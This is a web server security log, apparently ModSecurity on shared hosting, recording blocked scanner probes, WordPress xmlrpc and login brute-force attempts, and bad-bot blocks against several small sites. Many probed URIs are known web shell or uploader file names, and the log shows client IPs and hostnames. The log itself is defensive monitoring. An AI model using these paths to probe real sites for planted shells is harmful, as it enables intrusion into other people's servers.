[Tue May 26 16:16:16.705191 2026] [security2:error] [pid 782634:tid 782812] [client 20.192.3.167:11821] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/adminfuns.php"] [unique_id "ahV5-P_P9qBfeb1w76ZNIgAAADA"]
[Tue May 26 16:16:17.558223 2026] [security2:error] [pid 782634:tid 782857] [client 20.192.3.167:14074] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/abcd.php"] [unique_id "ahV5-f_P9qBfeb1w76ZNMwAAAF0"]
[Tue May 26 16:16:18.357841 2026] [security2:error] [pid 782634:tid 782877] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5-f_P9qBfeb1w76ZNPwAAAHE"]
[Tue May 26 16:16:18.500182 2026] [security2:error] [pid 782634:tid 782850] [client 20.192.3.167:8731] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/al.php"] [unique_id "ahV5-v_P9qBfeb1w76ZNTAAAAFY"]
[Tue May 26 16:16:19.255449 2026] [security2:error] [pid 782634:tid 782840] [client 14.234.193.132:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5-v_P9qBfeb1w76ZNVQAAAEw"]
[Tue May 26 16:16:19.678915 2026] [security2:error] [pid 782634:tid 782770] [client 20.192.3.167:1051] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/alfa.php"] [unique_id "ahV5-__P9qBfeb1w76ZNYwAAAAY"]
[Tue May 26 16:16:20.351995 2026] [security2:error] [pid 782634:tid 782852] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5-__P9qBfeb1w76ZNbwAAAFg"]
[Tue May 26 16:16:20.769956 2026] [security2:error] [pid 782634:tid 782776] [client 20.192.3.167:4973] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/as.php"] [unique_id "ahV5_P_P9qBfeb1w76ZNdgAAAAw"]
[Tue May 26 16:16:21.659000 2026] [security2:error] [pid 782634:tid 782800] [client 20.192.3.167:1643] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/aa.php"] [unique_id "ahV5_f_P9qBfeb1w76ZNjwAAACQ"]
[Tue May 26 16:16:22.001570 2026] [security2:error] [pid 782634:tid 782873] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5_f_P9qBfeb1w76ZNjgAAAG0"]
[Tue May 26 16:16:22.505957 2026] [security2:error] [pid 782634:tid 782767] [client 20.192.3.167:9920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/abc.php"] [unique_id "ahV5_v_P9qBfeb1w76ZNqAAAAAM"]
[Tue May 26 16:16:23.032698 2026] [security2:error] [pid 782634:tid 782825] [client 85.208.96.205:49062] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahV5___P9qBfeb1w76ZNtgAAAD0"]
[Tue May 26 16:16:23.032821 2026] [security2:error] [pid 782634:tid 782825] [client 85.208.96.205:49062] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahV5___P9qBfeb1w76ZNtgAAAD0"]
[Tue May 26 16:16:23.371796 2026] [security2:error] [pid 782634:tid 782835] [client 20.192.3.167:9465] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/av.php"] [unique_id "ahV5___P9qBfeb1w76ZNvAAAAEc"]
[Tue May 26 16:16:23.988505 2026] [security2:error] [pid 782634:tid 782848] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV5___P9qBfeb1w76ZNwgAAAFQ"]
[Tue May 26 16:16:24.862844 2026] [security2:error] [pid 782634:tid 782804] [client 20.192.3.167:13545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/autoload_classmap.php"] [unique_id "ahV6AP_P9qBfeb1w76ZN1wAAACg"]
[Tue May 26 16:16:25.543573 2026] [security2:error] [pid 782634:tid 782816] [client 103.44.52.196:34838] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Af_P9qBfeb1w76ZN4QAAADQ"]
[Tue May 26 16:16:25.543688 2026] [security2:error] [pid 782634:tid 782816] [client 103.44.52.196:34838] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Af_P9qBfeb1w76ZN4QAAADQ"]
[Tue May 26 16:16:25.875137 2026] [security2:error] [pid 782634:tid 782794] [client 20.192.3.167:11826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/asus.php"] [unique_id "ahV6Af_P9qBfeb1w76ZN7AAAAB4"]
[Tue May 26 16:16:25.990056 2026] [security2:error] [pid 782634:tid 782772] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Af_P9qBfeb1w76ZN5AAAAAg"]
[Tue May 26 16:16:26.020589 2026] [security2:error] [pid 782634:tid 782776] [client 45.154.98.76:54419] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-plain.php"] [unique_id "ahV6Af_P9qBfeb1w76ZN7gAAAAw"], referer: www.google.com
[Tue May 26 16:16:26.024291 2026] [security2:error] [pid 782634:tid 782790] [client 45.154.98.76:54401] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahV6Af_P9qBfeb1w76ZN8gAAABo"], referer: www.google.com
[Tue May 26 16:16:26.057918 2026] [security2:error] [pid 782634:tid 782833] [client 45.154.98.76:54921] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahV6Af_P9qBfeb1w76ZN7wAAAEU"]
[Tue May 26 16:16:26.160363 2026] [core:error] [pid 782634:tid 782850] (104)Connection reset by peer: [client 45.154.98.76:54005] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 16:16:26.497929 2026] [security2:error] [pid 782634:tid 782826] [client 45.154.98.76:57728] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahV6Av_P9qBfeb1w76ZODgAAAD4"], referer: www.google.com
[Tue May 26 16:16:26.502960 2026] [security2:error] [pid 782634:tid 782857] [client 45.154.98.76:53913] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/jdidzpyq.php"] [unique_id "ahV6Av_P9qBfeb1w76ZOEAAAAF0"], referer: www.google.com
[Tue May 26 16:16:26.849309 2026] [security2:error] [pid 782634:tid 782765] [client 20.192.3.167:1629] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/about.php"] [unique_id "ahV6Av_P9qBfeb1w76ZOFwAAAAE"]
[Tue May 26 16:16:26.973279 2026] [security2:error] [pid 782634:tid 782834] [client 45.154.98.76:62684] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/wp-plain.php"] [unique_id "ahV6Av_P9qBfeb1w76ZOHgAAAEY"], referer: www.google.com
[Tue May 26 16:16:27.261959 2026] [security2:error] [pid 782634:tid 782865] [client 106.219.85.83:5736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6A__P9qBfeb1w76ZOJAAAAGU"]
[Tue May 26 16:16:27.262100 2026] [security2:error] [pid 782634:tid 782865] [client 106.219.85.83:5736] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6A__P9qBfeb1w76ZOJAAAAGU"]
[Tue May 26 16:16:27.570971 2026] [security2:error] [pid 782634:tid 782860] [client 45.154.98.76:53139] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 76.98.154.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "eco-green.com.mx"] [uri "/ibaihrns.php"] [unique_id "ahV6A__P9qBfeb1w76ZONAAAAGA"], referer: www.google.com
[Tue May 26 16:16:27.805575 2026] [security2:error] [pid 782634:tid 782785] [client 20.192.3.167:7126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/atomlib.php"] [unique_id "ahV6A__P9qBfeb1w76ZOQQAAABU"]
[Tue May 26 16:16:27.863792 2026] [security2:error] [pid 782634:tid 782833] [client 114.119.158.133:22415] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "onesoft.in"] [uri "/content/images/all/08/034ac8b0-2bb2-4fd2-8754-ab3fd2315d54_hero-background.png"] [unique_id "ahV6A__P9qBfeb1w76ZORQAAAEU"], referer: https://onesoft.in/content/images/all/08/034ac8b0-2bb2-4fd2-8754-ab3fd2315d54_hero-background.png
[Tue May 26 16:16:27.904659 2026] [security2:error] [pid 782634:tid 782876] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6A__P9qBfeb1w76ZOMwAAAHA"]
[Tue May 26 16:16:28.633968 2026] [security2:error] [pid 782634:tid 782777] [client 20.192.3.167:11807] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/alfa-rex.php7"] [unique_id "ahV6BP_P9qBfeb1w76ZOYAAAAA0"]
[Tue May 26 16:16:29.479943 2026] [security2:error] [pid 782634:tid 782869] [client 20.192.3.167:12235] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/b.php"] [unique_id "ahV6Bf_P9qBfeb1w76ZOfgAAAGk"]
[Tue May 26 16:16:30.381470 2026] [security2:error] [pid 782634:tid 782821] [client 20.192.3.167:11789] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/buy.php"] [unique_id "ahV6Bv_P9qBfeb1w76ZOlQAAADk"]
[Tue May 26 16:16:30.461504 2026] [security2:error] [pid 782634:tid 782809] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Bv_P9qBfeb1w76ZOjQAAAC0"]
[Tue May 26 16:16:31.368005 2026] [security2:error] [pid 782634:tid 782881] [client 20.192.3.167:12281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/bless.php"] [unique_id "ahV6B__P9qBfeb1w76ZOqgAAAHU"]
[Tue May 26 16:16:31.602114 2026] [core:error] [pid 782634:tid 782806] (104)Connection reset by peer: [client 45.154.98.76:55950] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 16:16:32.197742 2026] [security2:error] [pid 782634:tid 782843] [client 20.192.3.167:9466] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/class-t.api.php"] [unique_id "ahV6CP_P9qBfeb1w76ZOwgAAAE8"]
[Tue May 26 16:16:32.456190 2026] [security2:error] [pid 782634:tid 782889] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6CP_P9qBfeb1w76ZOvwAAAH0"]
[Tue May 26 16:16:33.062408 2026] [security2:error] [pid 782634:tid 782824] [client 20.192.3.167:8638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/cache.php"] [unique_id "ahV6Cf_P9qBfeb1w76ZO4gAAADw"]
[Tue May 26 16:16:33.146319 2026] [security2:error] [pid 782634:tid 782871] [client 119.30.119.204:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "preetishah.com"] [uri "/index.php"] [unique_id "ahV6CP_P9qBfeb1w76ZOzgAAAGs"]
[Tue May 26 16:16:33.960465 2026] [security2:error] [pid 782634:tid 782802] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Cf_P9qBfeb1w76ZO7QAAACY"]
[Tue May 26 16:16:33.970648 2026] [security2:error] [pid 782634:tid 782822] [client 20.192.3.167:4962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/content.php"] [unique_id "ahV6Cf_P9qBfeb1w76ZO-gAAADo"]
[Tue May 26 16:16:34.973944 2026] [security2:error] [pid 782634:tid 782767] [client 20.192.3.167:4965] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/classwithtostring.php"] [unique_id "ahV6Cv_P9qBfeb1w76ZPFQAAAAM"]
[Tue May 26 16:16:35.265128 2026] [security2:error] [pid 782634:tid 782663] [remote 113.190.40.93:60166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahV6C__P9qBfeb1w76ZPFwAAUhw"]
[Tue May 26 16:16:35.845057 2026] [security2:error] [pid 782634:tid 782860] [client 20.192.3.167:3203] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/css.php"] [unique_id "ahV6C__P9qBfeb1w76ZPKwAAAGA"]
[Tue May 26 16:16:36.176520 2026] [security2:error] [pid 782634:tid 782855] [client 103.44.52.196:41804] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 196.52.44.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6DP_P9qBfeb1w76ZPLAAAAFs"]
[Tue May 26 16:16:36.176702 2026] [security2:error] [pid 782634:tid 782855] [client 103.44.52.196:41804] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahV6DP_P9qBfeb1w76ZPLAAAAFs"]
[Tue May 26 16:16:36.631859 2026] [security2:error] [pid 782634:tid 782884] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6DP_P9qBfeb1w76ZPNQAAAHg"]
[Tue May 26 16:16:36.781343 2026] [security2:error] [pid 782634:tid 782766] [client 20.192.3.167:6980] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/chosen.php"] [unique_id "ahV6DP_P9qBfeb1w76ZPQwAAAAI"]
[Tue May 26 16:16:36.928874 2026] [core:error] [pid 782634:tid 782882] (104)Connection reset by peer: [client 45.154.98.76:64782] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 16:16:37.718608 2026] [security2:error] [pid 782634:tid 782864] [client 106.219.85.83:8957] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 83.85.219.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Df_P9qBfeb1w76ZPWgAAAGQ"]
[Tue May 26 16:16:37.718935 2026] [security2:error] [pid 782634:tid 782864] [client 106.219.85.83:8957] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "soto-plumbing.com"] [uri "/xmlrpc.php"] [unique_id "ahV6Df_P9qBfeb1w76ZPWgAAAGQ"]
[Tue May 26 16:16:37.819351 2026] [security2:error] [pid 782634:tid 782820] [client 20.192.3.167:13999] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/doc.php"] [unique_id "ahV6Df_P9qBfeb1w76ZPWwAAADg"]
[Tue May 26 16:16:38.114867 2026] [security2:error] [pid 782634:tid 782860] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahV6Df_P9qBfeb1w76ZPWQAAAGA"]
[Tue May 26 16:16:38.644602 2026] [security2:error] [pid 782634:tid 782874] [client 20.192.3.167:14019] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/elp.php"] [unique_id "ahV6Dv_P9qBfeb1w76ZPcAAAAG4"]
[Tue May 26 16:16:39.435828 2026] [security2:error] [pid 782634:tid 782805] [client 20.192.3.167:7166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/Exception-class.php"] [unique_id "ahV6D__P9qBfeb1w76ZPiQAAACk"]
[Tue May 26 16:16:39.589877 2026] [security2:error] [pid 782634:tid 782667] [remote 74.7.241.58:51826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahV6D__P9qBfeb1w76ZPigAAHyA"], referer: https://www.billing.mosykay.com/?path=/home1/taote1zo/public_html/shop/wp-includes
[Tue May 26 16:16:40.286713 2026] [security2:error] [pid 782634:tid 782864] [client 20.192.3.167:14001] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.3.192.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "obinnawrites.com"] [uri "/ee.php"] [unique_id "ahV6EP_P9qBfeb1w76ZPmAAAAGQ"]
